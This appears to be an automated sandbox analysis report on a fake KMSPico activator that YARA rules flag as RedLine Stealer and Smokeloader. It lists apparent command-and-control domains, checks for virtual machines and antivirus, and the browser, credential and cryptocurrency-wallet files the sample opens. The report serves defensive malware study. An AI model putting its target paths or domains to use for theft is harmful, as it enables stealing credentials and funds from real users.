            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: KMSPico.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: KMSPico.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@2/1
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\69d65d6d-4339-42fb-b020-3566e279c540Jump to behavior
            Source: KMSPico.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\KMSPico.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: KMSPico.exe, 00000000.00000003.2035819384.0000000004B24000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2046237881.0000000004B28000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2046349113.0000000004B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: KMSPico.exeReversingLabs: Detection: 36%
            Source: KMSPico.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\KMSPico.exeFile read: C:\Users\user\Desktop\KMSPico.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\KMSPico.exe C:\Users\user\Desktop\KMSPico.exe
            Source: C:\Users\user\Desktop\KMSPico.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\KMSPico.exeUnpacked PE file: 0.2.KMSPico.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\KMSPico.exeUnpacked PE file: 0.2.KMSPico.exe.400000.0.unpack
            Source: KMSPico.exeStatic PE information: section name: .text entropy: 7.7446509642308685
            Source: C:\Users\user\Desktop\KMSPico.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\KMSPico.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exe TID: 3144Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exe TID: 2828Thread sleep time: -30000s >= -30000sJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259052539.0000000002559000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259067959.0000000002593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259067959.0000000002593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[ {
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: C:\Users\user\Desktop\KMSPico.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: associationokeo.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: turkeyunlikelyofw.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pooreveningfuseor.pw
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: edurestunningcrackyow.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: detectordiscusser.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: problemregardybuiwo.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: lighterepisodeheighte.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: technologyenterdo.shop
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002560000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2101896960.0000000004B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\KMSPico.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: KMSPico.exe, 00000000.00000002.2257432967.0000000000196000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: -A%appdata%\Electrum\wallets\
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx Libertyj
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/ExodusWeb3
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsY[
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
            Source: KMSPico.exe, 00000000.00000003.2034903140.000000000256C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live/>
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
